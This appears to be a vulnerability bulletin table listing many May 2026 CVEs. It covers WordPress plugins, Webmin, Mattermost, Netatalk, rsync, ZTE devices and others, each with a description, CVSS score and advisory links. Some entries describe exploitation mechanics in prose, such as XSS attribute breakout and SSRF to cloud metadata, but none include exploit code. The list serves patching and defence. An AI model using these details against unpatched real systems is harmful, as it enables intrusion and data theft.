| Webmin--Webmin | Webmin before 2.641 contains a stored cross-site scripting vulnerability in the email template description field of the System and Server Status module that allows low-privileged authenticated attackers to execute arbitrary JavaScript in the browser context of administrators by injecting unsanitized input stored in save_tmpl.cgi and rendered unescaped in list_tmpls.cgi. | 2026-05-21 | 5.4 | CVE-2026-22678 | https://webmin.com/changelog/webmin-2.641-released/ https://www.vulncheck.com/advisories/webmin-stored-xss-via-system-and-server-status |
| winking--Word 2 Cash | The Word 2 Cash plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Stored Cross-Site Scripting in versions up to and including 0.9.2. This is due to the complete absence of nonce verification on the settings save handler in the w2c_admin() function, combined with missing input sanitization before storage and missing output escaping when rendering the stored value. The w2c-definitions POST parameter is saved raw via update_option() and later echoed without escaping inside a <textarea> element. This makes it possible for unauthenticated attackers to forge a request on behalf of a logged-in administrator, storing arbitrary JavaScript payloads that execute in the WordPress admin panel whenever the settings page is visited. | 2026-05-20 | 6.1 | CVE-2026-6395 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e4c7ca5c-38aa-4413-83eb-29185cca2a74?source=cve https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L31 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L31 https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L20 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L20 https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L18 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L18 |
| WP Chill--Image Photo Gallery Final Tiles Grid | Missing Authorization vulnerability in WP Chill Image Photo Gallery Final Tiles Grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Photo Gallery Final Tiles Grid: from n/a through 3.6.11. | 2026-05-20 | 4.3 | CVE-2026-27424 | https://patchstack.com/database/wordpress/plugin/final-tiles-grid-gallery-lite/vulnerability/wordpress-image-photo-gallery-final-tiles-grid-plugin-3-6-11-broken-access-control-vulnerability?_s_id=cve |
| wpbean--WPB Floating Menu or Categories Sticky Floating Side Menu & Categories with Icons | The WPB Floating Menu & Categories for WordPress - Sticky Side Menu with Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Icon CSS Class' category field in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-21 | 4.9 | CVE-2026-4811 | https://www.wordfence.com/threat-intel/vulnerabilities/id/961702ff-60fb-41ff-99b0-a37ade051083?source=cve https://plugins.trac.wordpress.org/browser/wpb-floating-menu-or-categories/tags/1.0.8/admin/category-icon.php#L41 |
| wpdive--Nexa Blocks Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE | The Nexa Blocks - Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in versions up to and including 1.1.1. This is due to the import_demo() function accepting a user-supplied URL in the demo_json_file POST parameter and passing it directly to wp_remote_get() without any URL validation or restriction against internal or private network destinations. The nexa_blocks_nonce required for the AJAX action is publicly exposed in the HTML source of any frontend page where the plugin is active via wp_localize_script on the enqueue_block_assets hook, effectively making the nonce available to all visitors and bypassing any intended authentication barrier. This makes it possible for unauthenticated attackers to make server-side HTTP requests to arbitrary internal or external destinations, potentially exposing internal services, cloud metadata endpoints such as the AWS instance metadata service, localhost services, and other resources not intended to be publicly accessible. A secondary SSRF vector also exists whereby image URLs extracted from the attacker-controlled JSON response are subsequently fetched via a second wp_remote_get() call, allowing chained exploitation through a crafted JSON payload. | 2026-05-20 | 5.4 | CVE-2026-6394 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4bb3067-7953-466d-a469-8a101450f133?source=cve https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/template/template.php#L242 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/template/template.php#L242 https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/template/template.php#L236 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/template/template.php#L236 https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/classes/enqueue-assets.php#L84 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/classes/enqueue-assets.php#L84 |
| WPFunnels Team--Mail Mint | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPFunnels Team Mail Mint allows Retrieve Embedded Sensitive Data. This issue affects Mail Mint: from n/a through 1.19.5. | 2026-05-21 | 4.3 | CVE-2026-27349 | https://patchstack.com/database/wordpress/plugin/mail-mint/vulnerability/wordpress-mail-mint-plugin-1-19-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| wpxpo--FastX | The FastX theme for WordPress is vulnerable to unauthorized limited plugin installation and activation due to missing capability checks on the 'ultp_install_callback' and 'ultp_activate_callback' functions in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate the PostX plugin. | 2026-05-22 | 4.3 | CVE-2026-2518 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6f5c4194-4f97-4f85-af90-e983ba9ce3a6?source=cve https://themes.trac.wordpress.org/browser/fastx/1.0.2/classes/Initialization.php#L264 https://themes.trac.wordpress.org/browser/fastx/1.0.2/classes/Initialization.php#L249 |
| wupsales--AI Chatbot & Workflow Automation by AIWU | The AI Chatbot & Workflow Automation by AIWU plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'X-Forwarded-For' header in versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Practical exploitation is constrained due to a 20-character storage limit. | 2026-05-20 | 6.4 | CVE-2026-2955 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8d434250-aa16-4ba1-a1f8-289371176545?source=cve https://plugins.trac.wordpress.org/changeset/3505998/ai-copilot-content-generator |
| xpro--Xpro Addons 140+ Widgets for Elementor | The Xpro Addons - 140+ Widgets for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_content_editor function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to create published Xpro templates. | 2026-05-20 | 5.3 | CVE-2025-15369 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cf49d3fb-de14-42bc-bf51-f9adceba0d32?source=cve https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk?rev=3508547 |
| yangzongzhuan--RuoYi-Vue | A vulnerability was found in yangzongzhuan RuoYi-Vue up to 3.9.2. Impacted is the function FileUploadUtils.upload of the file /common/upload of the component Common Upload Endpoint. Performing a manipulation results in unrestricted upload. The attack is possible to be carried out remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9374 | VDB-365338 \| yangzongzhuan RuoYi-Vue Common Upload Endpoint upload FileUploadUtils.upload unrestricted upload VDB-365338 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #813252 \| RuoYi RuoYi-Vue 3.9.2 Cross Site Scripting |
| yog2515--General Options | The General Options plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 1.1.0. This is due to the use of sanitize_text_field() for output escaping in the Contact Number (ad_contact_number) field - a function that strips HTML tags but does not encode double-quote characters to their HTML entity equivalent (&quot;). When the stored value is echoed inside a double-quoted HTML attribute (value="..."), an attacker-supplied double-quote character breaks out of the attribute context. Even with WordPress's wp_magic_quotes mechanism (which prefixes quotes with a backslash), the resulting \" sequence is NOT treated as an escaped quote by HTML parsers - the backslash is rendered as a literal character and the bare double-quote still closes the attribute. This makes it possible for authenticated attackers with Administrator-level access and above to inject arbitrary web scripts in the admin settings page that will execute whenever any administrator visits the General Options settings page. | 2026-05-20 | 4.4 | CVE-2026-6399 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d29c69bb-4feb-477e-b18f-934ece21aff6?source=cve https://plugins.trac.wordpress.org/browser/general-options/trunk/direct-main.php https://plugins.trac.wordpress.org/browser/general-options/tags/1.1.0/direct-main.php https://plugins.trac.wordpress.org/browser/general-options/trunk/direct-action.php https://plugins.trac.wordpress.org/browser/general-options/tags/1.1.0/direct-action.php |
| ZTE--MU5250 | There is an unauthorized access vulnerability in ZTE MU5250. Due to improper permission control of the Web interface, an unauthorized attacker can modify configuration through the interface. | 2026-05-19 | 6.3 | CVE-2026-44408 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2657904255874650158 |
| ZTE--MU5250 | There is an information disclosure vulnerability in ZTE MU5250. Due to improper configuration of the access control mechanism, attackers can obtain information without authorization, causing the risk of information disclosure. | 2026-05-22 | 5.7 | CVE-2026-44409 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3711746568357343342 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the bot engine's findResult query does not filter results by typebotId, allowing an authenticated user to load result data (user answers, variable values) from a different typebot by supplying a foreign resultId to the startChat endpoint. Exploitation is constrained by CUID2's cryptographically random 24-character IDs (making brute-force infeasible), the requirement that rememberUser be enabled, and the need for matching variable names in the current typebot. If successfully exploited, an attacker can access the original user's previous answers, session variable values, and hasStarted flag, potentially exposing PII like names, emails, and phone numbers. This issue has been fixed in version 3.16.0. | 2026-05-22 | 3.1 | CVE-2026-39967 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-f475-7m4x-m6mx https://github.com/baptisteArno/typebot.io/commit/73162634e6bdebd37a1a571db4062d30854e0400 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Besen--BS20 EV Charging Station | A vulnerability was determined in Besen BS20 EV Charging Station up to 20260426. This impacts an unknown function of the component Bluetooth Low Energy Handler. Executing a manipulation can lead to weak password requirements. The attack needs to be done within the local network. This attack is characterized by high complexity. The exploitability is said to be difficult. The original disclosure mentions that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." | 2026-05-24 | 3.1 | CVE-2026-9394 | VDB-365375 \| Besen BS20 EV Charging Station Bluetooth Low Energy weak password VDB-365375 \| CTI Indicators (IOB, IOC, TTP) Submit #813569 \| Besen EV Charging Station BS20 EV Charger Weak Authentication https://github.com/carfeii/besen#finding-1-weak-authentication-mechanism-in-besen-home-ev-charging-station-via-ble |
| Besen--BS20 EV Charging Station | A vulnerability was identified in Besen BS20 EV Charging Station up to 20260426. Affected is an unknown function of the component BLE/UDP. The manipulation leads to insufficiently protected credentials. The attack needs to be initiated within the local network. The original disclosure mentions that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." | 2026-05-24 | 3.5 | CVE-2026-9395 | VDB-365376 \| Besen BS20 EV Charging Station BLE/UDP insufficiently protected credentials VDB-365376 \| CTI Indicators (IOB, IOC, TTP) Submit #813572 \| Besen EV Charging Station BS20 EV Charger Insufficiently Protected Credentials https://github.com/carfeii/besen#finding-2-cleartext-credential-exposure-via-ble-and-udp-in-besen-home-ev-charging-station |
| Besen--BS20 EV Charging Station | A security flaw has been discovered in Besen BS20 EV Charging Station up to 20260426. Affected by this vulnerability is an unknown functionality of the component Firmware Version Check. The manipulation results in improper restriction of rendered UI layers. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitation appears to be difficult. The original disclosure mentions that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." | 2026-05-24 | 3.7 | CVE-2026-9396 | VDB-365377 \| Besen BS20 EV Charging Station Firmware Version Check ui layer VDB-365377 \| CTI Indicators (IOB, IOC) Submit #813575 \| Besen EV Charging Station BS20 EV Charger Improper Verification of Cryptographic Signature https://github.com/carfeii/besen#finding-3-firmware-version-check-manipulation-and-ui-spoofing |
| Besen--BS20 EV Charging Station | A security vulnerability has been detected in Besen BS20 EV Charging Station up to 20260426. This affects an unknown part of the component BLE/WiFi. Such manipulation leads to authentication bypass by capture-replay. The attack must be carried out from within the local network. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The original disclosure mentions that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." | 2026-05-24 | 3.1 | CVE-2026-9398 | VDB-365379 \| Besen BS20 EV Charging Station BLE/WiFi authentication replay VDB-365379 \| CTI Indicators (IOB, IOC, TTP) Submit #813577 \| Besen EV Charging Station BS20 EV Charger Improper Authorization https://github.com/carfeii/besen#finding-5-unauthorized-tampering-of-charger-commands |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) a Use of a Broken or Risky Cryptographic Algorithm vulnerability in the ssh. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. | 2026-05-22 | 3.6 | CVE-2025-46371 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure "X-Content-Type-Options" header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly. | 2026-05-20 | 3.7 | CVE-2025-31985 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| jarrodwatts--claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, contains a path traversal vulnerability that allows attackers to read arbitrary files by supplying an unvalidated transcript_path value via stdin JSON. Attackers can access any file readable by the process and the file metadata is written to a persistent cache file with insufficient permissions, creating a forensic record of accessed paths that survives process exit. | 2026-05-18 | 3.3 | CVE-2026-47091 | https://github.com/jarrodwatts/claude-hud/issues/485 https://github.com/jarrodwatts/claude-hud/pull/487 https://github.com/jarrodwatts/claude-hud/commit/234d9aad919b51326a43bcf90b45ae35c23afc30 https://www.vulncheck.com/advisories/claude-hud-path-traversal-via-transcript-path |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to escape some variables that could contain malicious content during error page composition, which allows an attacker with access to edit some site configuration to execute malicious code by injecting JS as part of those values. Mattermost Advisory ID: MMSA-2026-00622 | 2026-05-18 | 3.8 | CVE-2026-3495 | MMSA-2026-00622 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to validate that the RefreshedToken differs from the original invite token during remote cluster invite confirmation which allows an authenticated attacker to bypass token rotation and reuse the original invite token via sending a crafted invite confirmation with a RefreshedToken matching the original token. Mattermost Advisory ID: MMSA-2026-00575 | 2026-05-18 | 3.7 | CVE-2026-4273 | MMSA-2026-00575 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to check if {{team_id}} was being changed when updating playbooks, allowing users with only {{Manage Playbook Configurations}} permission to change a playbook's team, bypassing manage members restriction via PUT api. Mattermost Advisory ID: MMSA-2025-00552 | 2026-05-18 | 3.1 | CVE-2026-4286 | MMSA-2025-00552 |
| Mattermost--Mattermost | Mattermost Desktop App versions <=6.1 6.0.1 5.4.13.0 fail to prevent server-rendered content from closing an underlying application view in the Mattermost Desktop App which allows a malicious server or plugin to crash the desktop client via invoking {{window.close()}} in the renderer context, leading to a denial of service condition at the client level. Mattermost Advisory ID: MMSA-2026-00633 | 2026-05-18 | 3.5 | CVE-2026-4643 | MMSA-2026-00633 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to validate the Host header when constructing response URLs for custom slash commands, which allows an authenticated attacker to redirect slash command responses to an attacker-controlled server via a spoofed Host header. Mattermost Advisory ID: MMSA-2026-00582 | 2026-05-18 | 3.5 | CVE-2026-6333 | MMSA-2026-00582 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to enforce client identity binding during the OAuth authorization code redemption flow, which allows an authenticated OAuth client to redeem authorization codes issued to a different client via a crafted token exchange request. Mattermost Advisory ID: MMSA-2026-00570 | 2026-05-18 | 3.1 | CVE-2026-6334 | MMSA-2026-00570 |
| n/a--JeecgBoot | A vulnerability has been found in JeecgBoot 3.9.1. This issue affects some unknown processing of the file /openapi/call/ of the component OpenAPI Endpoint. Such manipulation leads to improper authentication. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is assessed as difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 3.7 | CVE-2026-9373 | VDB-365337 \| JeecgBoot OpenAPI Endpoint call improper authentication VDB-365337 \| CTI Indicators (IOB, IOC, IOA) Submit #813251 \| jeecgboot JeecgBoot 3.9.1 Improper Authentication |
| n/a--vBulletin | A vulnerability was found in vBulletin 6.x. This impacts an unknown function of the component Login. Performing a manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been made public and could be used. VulDB is withholding an extended redistribution of exploit details to prevent simplified exploitation. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 3.5 | CVE-2026-9357 | VDB-365320 \| vBulletin Login cross site scripting VDB-365320 \| CTI Indicators (IOB, IOC, TTP) Submit #813052 \| Cross Site Scripting in the vBulletin 6.xx forum Vbulletin 6.x.x Cross Site Scripting |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. Versions 2025.7 and prior contain a Reflected Cross-Site Scripting (XSS) vulnerability through the fsNick cookie parameter. The application reflects the cookie's value directly into the HTML without sanitization. The fsNick cookie is rendered into the DOM without encoding. While the server does reject the modified session and forces a logout, the HTML containing the payload reaches the browser first. This lets the script execute immediately upon load, effectively beating the redirect. This issue has been fixed in version 2025.8. | 2026-05-18 | 3.9 | CVE-2026-27964 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-gq5c-rw37-g46c https://github.com/NeoRazorX/facturascripts/commit/9066e10326029adf012114e27eb5f3f33f78ecfd |
| Netatalk--Netatalk | A dead bounds check in the Spotlight RPC unmarshaller in Netatalk 3.0.0 through 4.4.2 results in an unreachable code path that provides no effective bounds protection, which may allow a remote authenticated attacker to obtain limited information via crafted Spotlight RPC requests. | 2026-05-21 | 3.1 | CVE-2026-44057 | Netatalk Security Advisory CVE-2026-44057 |
| Netatalk--Netatalk | A race condition in the privilege toggle mechanism in Netatalk 2.2.5 through 4.4.2 allows a local attacker to obtain limited information, modify limited data, or cause a minor service disruption. | 2026-05-21 | 3.9 | CVE-2026-44059 | Netatalk Security Advisory CVE-2026-44059 |
| Netatalk--Netatalk | An off-by-two error in lp_write() in papd in Netatalk 2.0.0 through 4.4.2 allows an adjacent network attacker to modify limited data or cause a minor service disruption via crafted print data. | 2026-05-21 | 3.7 | CVE-2026-44065 | Netatalk Security Advisory CVE-2026-44065 |
| Netatalk--Netatalk | A heap over-read in extended attribute (EA) header parsing in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to obtain limited information or cause a minor service disruption via crafted EA data. | 2026-05-21 | 3.7 | CVE-2026-44067 | Netatalk Security Advisory CVE-2026-44067 |
| Netatalk--Netatalk | An integer underflow in the volxlate function in Netatalk 3.0.0 through 4.4.2 allows a local privileged user to obtain limited information, modify limited data, or cause a minor service disruption via crafted volume translation input. | 2026-05-21 | 3.4 | CVE-2026-44069 | Netatalk Security Advisory CVE-2026-44069 |
| Netatalk--Netatalk | An unbounded memory reallocation in the charset conversion code in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted character conversion requests. | 2026-05-21 | 3.1 | CVE-2026-44070 | Netatalk Security Advisory CVE-2026-44070 |
| Netatalk--Netatalk | Netatalk 3.1.2 through 4.4.2 is compiled without FORTIFY_SOURCE, which disables built-in buffer overflow detection at runtime, potentially allowing a remote attacker to cause a minor denial of service via memory errors that would otherwise be caught and safely terminated by runtime protection. | 2026-05-21 | 3.7 | CVE-2026-44071 | Netatalk Security Advisory CVE-2026-44071 |
| Netatalk--Netatalk | Netatalk 2.1.0 through 4.4.2 combines multiple errno values using bitwise OR, resulting in incorrect error codes when multiple error conditions occur simultaneously, which may allow a remote attacker to cause a minor service disruption via conditions that trigger incorrect error-handling paths. | 2026-05-21 | 3.7 | CVE-2026-44074 | Netatalk Security Advisory CVE-2026-44074 |
| Netatalk--Netatalk | A missing break statement in DSI OpenSession processing in Netatalk 1.5.0 through 4.4.2 causes a DSIOPT_ATTNQUANT switch case to fall through into DSIOPT_SERVQUANT, resulting in unintended session option handling that may allow a remote attacker to cause a minor service disruption via crafted DSI session options. | 2026-05-21 | 3.7 | CVE-2026-44075 | Netatalk Security Advisory CVE-2026-44075 |
| Netatalk--Netatalk | A format string argument mismatch in Netatalk 3.0.3 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted input that triggers incorrect format string processing. | 2026-05-21 | 3.1 | CVE-2026-7835 | Netatalk Security Advisory CVE-2026-7835 |
| Netatalk--Netatalk | An incorrect calculation in the hextoint macro in Netatalk 2.0.0 through 4.4.2 due to improper uppercase character handling allows a remote authenticated attacker to cause limited data modification via crafted hexadecimal input. | 2026-05-21 | 3.1 | CVE-2026-7836 | Netatalk Security Advisory CVE-2026-7836 |
| Netatalk--Netatalk | A time-of-check time-of-use (TOCTOU) condition in the ad_flush function in Netatalk 3.0.0 through 4.4.2 involves root-privileged file operations, which may allow a remote attacker to cause limited data modification under specific race conditions. | 2026-05-21 | 3.7 | CVE-2026-7837 | Netatalk Security Advisory CVE-2026-7837 |
| Netatalk--Netatalk | Netatalk 2.2.1 through 4.4.2 calls system() after a failed chdir() without properly handling the error condition, which allows a local privileged user to execute unintended commands or cause a minor service disruption under specific conditions. | 2026-05-21 | 2.5 | CVE-2026-44072 | Netatalk Security Advisory CVE-2026-44072 |
| OpenHarmony--OpenHarmony | In OpenHarmony v6.0 and prior versions, a local attacker can cause a DoS. | 2026-05-19 | 3.3 | CVE-2026-25110 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony--OpenHarmony | In OpenHarmony v6.0 and prior versions, a local attacker can cause a DoS. | 2026-05-19 | 3.3 | CVE-2026-27781 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony--OpenHarmony | In OpenHarmony v6.0 and prior versions, a local attacker can cause a DoS. | 2026-05-19 | 3.3 | CVE-2026-28751 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony--OpenHarmony | In OpenHarmony v6.0 and prior versions, a local attacker can cause a DoS. | 2026-05-19 | 3.3 | CVE-2026-33565 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| opensourcepos--Open Source Point of Sale | A flaw has been found in opensourcepos Open Source Point of Sale up to 3.4.2. Impacted is the function Login of the file app/Models/Employee.php of the component Employee Login. This manipulation causes use of weak hash. Remote exploitation of the attack is possible. The attack is considered to have high complexity. The exploitability is considered difficult. The actual existence of this vulnerability is currently in question. The vendor explains: "[T]he code is still there to allow the upgrade path to work. The default password is initially seeded with the old hash function, but then migrated to a newer one after login. [T]he hash version check might be cleaned up in the future. Currently it's not actively in use as any password change will use a newer hash function." | 2026-05-18 | 3.7 | CVE-2026-8803 | VDB-364436 | opensourcepos Open Source Point of Sale Employee Login Employee.php login weak hash VDB-364436 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #802561 | opensourcepos Open Source Point of Sale 3.4.1 Weak Encoding for Password |
| QuantumNous--new-api | A security vulnerability has been detected in QuantumNous new-api up to 0.12.1. This affects the function RelayMidjourneyImage/GetByOnlyMJId of the file router/relay-router.go of the component Midjourney Image Relay Endpoint. Such manipulation leads to authorization bypass. The attack can be launched remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 3.7 | CVE-2026-9306 | VDB-365253 | QuantumNous new-api Midjourney Image Relay Endpoint relay-router.go GetByOnlyMJId authorization VDB-365253 | CTI Indicators (IOB, IOC, IOA) Submit #812196 | QuantumNous new-api 0.12.1 Authorization Bypass Through User-Controlled Key (CWE-639) https://gist.github.com/YLChen-007/13974ead25fc6dac42fd7bac62fbb2df |
| RsyncProject--rsync | Rsync versions before 3.4.3 contain an off-by-one out-of-bounds stack write vulnerability in the establish_proxy_connection() function in socket.c that allows network attackers to corrupt stack memory by sending a malformed HTTP proxy response. Attackers can exploit this by positioning themselves between the client and proxy or controlling the proxy server to send a response line of 1023 or more bytes without a newline terminator, causing a null byte to be written to an out-of-bounds stack address when the RSYNC_PROXY environment variable is set. | 2026-05-20 | 3.1 | CVE-2026-45232 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-8f85-j2cv-59m8 https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-off-by-one-stack-write-via-http-proxy |
| SourceCodester--SUP Online Shopping | A vulnerability was identified in SourceCodester SUP Online Shopping 1.0. The impacted element is an unknown function of the file /admin/productedit.php. The manipulation of the argument productName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-05-24 | 2.4 | CVE-2026-9377 | VDB-365340 | SourceCodester SUP Online Shopping productedit.php cross site scripting VDB-365340 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813270 | sourcecodester SUP Online Shopping Project V1.0 Cross Site Scripting https://github.com/redshadowword-cell/CVE/issues/13 https://www.sourcecodester.com/ |
| SPIP--SPIP | action/cookie.php in ecrire in SPIP before 4.4.15 is prone to an open redirect vulnerability. | 2026-05-24 | 3.5 | CVE-2026-48832 | https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-15.html?lang=fr https://git.spip.net/spip/spip/-/commit/75629034697ab52a963a340afd10930407e1cd55 https://git.spip.net/spip/ecrire/-/commit/a22cb8a56f1e37ff3854b73ff3f66aa3df47070a |
| ulisesbocchio--jasypt-spring-boot | A weakness has been identified in ulisesbocchio jasypt-spring-boot up to 3.0.5/4.0.4. Affected by this vulnerability is the function getSecretKeySaltGenerator of the file jasypt-spring-boot/src/main/java/com/ulisesbocchio/jasyptspringboot/encryptor/SimpleGCMConfig.java of the component Password Hash Handler. Executing a manipulation can lead to use of a one-way hash with a predictable salt. The attack can be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 3.7 | CVE-2026-9370 | VDB-365333 | ulisesbocchio jasypt-spring-boot Password Hash SimpleGCMConfig.java getSecretKeySaltGenerator hash predictable salt VDB-365333 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813198 | Ulises Bocchio jasypt-spring-boot 3.0.0 to 4.0.4 Cryptographic Issues https://github.com/ulisesbocchio/jasypt-spring-boot/issues/431 https://github.com/dntyfate/cve/issues/3 https://github.com/ulisesbocchio/jasypt-spring-boot/ |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 9front--9front | Mothra would respect a default value given by a website for HTML file upload forms. An attacker could craft a website with a malicious default file path, and then conceal this form element. | 2026-05-22 | not yet calculated | CVE-2026-9053 | https://git.9front.org/plan9front/9front/d145acc9ef0da47131af6ad94e87264e04870d47/commit.html |
| 9front--9front | An attacker sending tcp, il, rudp, rudp, or gre packets with a length less than the header size would trigger a kernel panic. | 2026-05-22 | not yet calculated | CVE-2026-9054 | https://git.9front.org/plan9front/9front/7838d68969549f938cc8e80c0c2b4218cb12805c/commit.html https://git.9front.org/plan9front/9front/f86917b75e9562f90545b7e484dbdcd748236952/commit.html https://git.9front.org/plan9front/9front/70c97c334171c715df82774d1a47638abaca2db4/commit.html |
| Advantech--WebAccess/SCADA 8.0-2015.08.16 | Cross Site Scripting vulnerability in Advantech WebAccess/SCADA 8.0-2015.08.16 allows a remote attacker to obtain sensitive information via the decryption field in the Create New Project User component. | 2026-05-22 | not yet calculated | CVE-2026-36226 | https://github.com/NullByte8080/CVE-2026-36226 |
| Altium--Altium 365 | A missing authentication vulnerability exists in the Altium 365 SearchService. A legacy SOAP endpoint exposes search index operations without requiring authentication, session tokens, or any form of identity verification. An unauthenticated network attacker who can reference a target workspace's identifier can interact with that workspace's search index, crossing tenant boundaries. Successful exploitation allows reading a workspace's indexed contents (such as component data, project and folder names, and user metadata) and injecting, modifying, or deleting search index entries. These operations affect the search index only, not the underlying vault data, but they can disclose sensitive workspace information and compromise the integrity and availability of search results. Altium 365 cloud deployments are affected; on-premise Altium Enterprise Server is not affected. | 2026-05-21 | not yet calculated | CVE-2026-9152 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server ComparisonService due to missing filename sanitization in the Gerber file upload APIs. A regular authenticated workspace user can supply a crafted filename in the multipart Content-Disposition header to escape the intended temporary upload directory and write arbitrary files to any location on the server filesystem. Because content-controlled files can be written to web-accessible directories, this can be escalated to remote code execution in the context of the service account. It can also be used to overwrite application binaries or configuration files, leading to service takeover or denial of service. | 2026-05-20 | not yet calculated | CVE-2026-9102 | https://www.altium.com/platform/security-compliance/security-advisories |
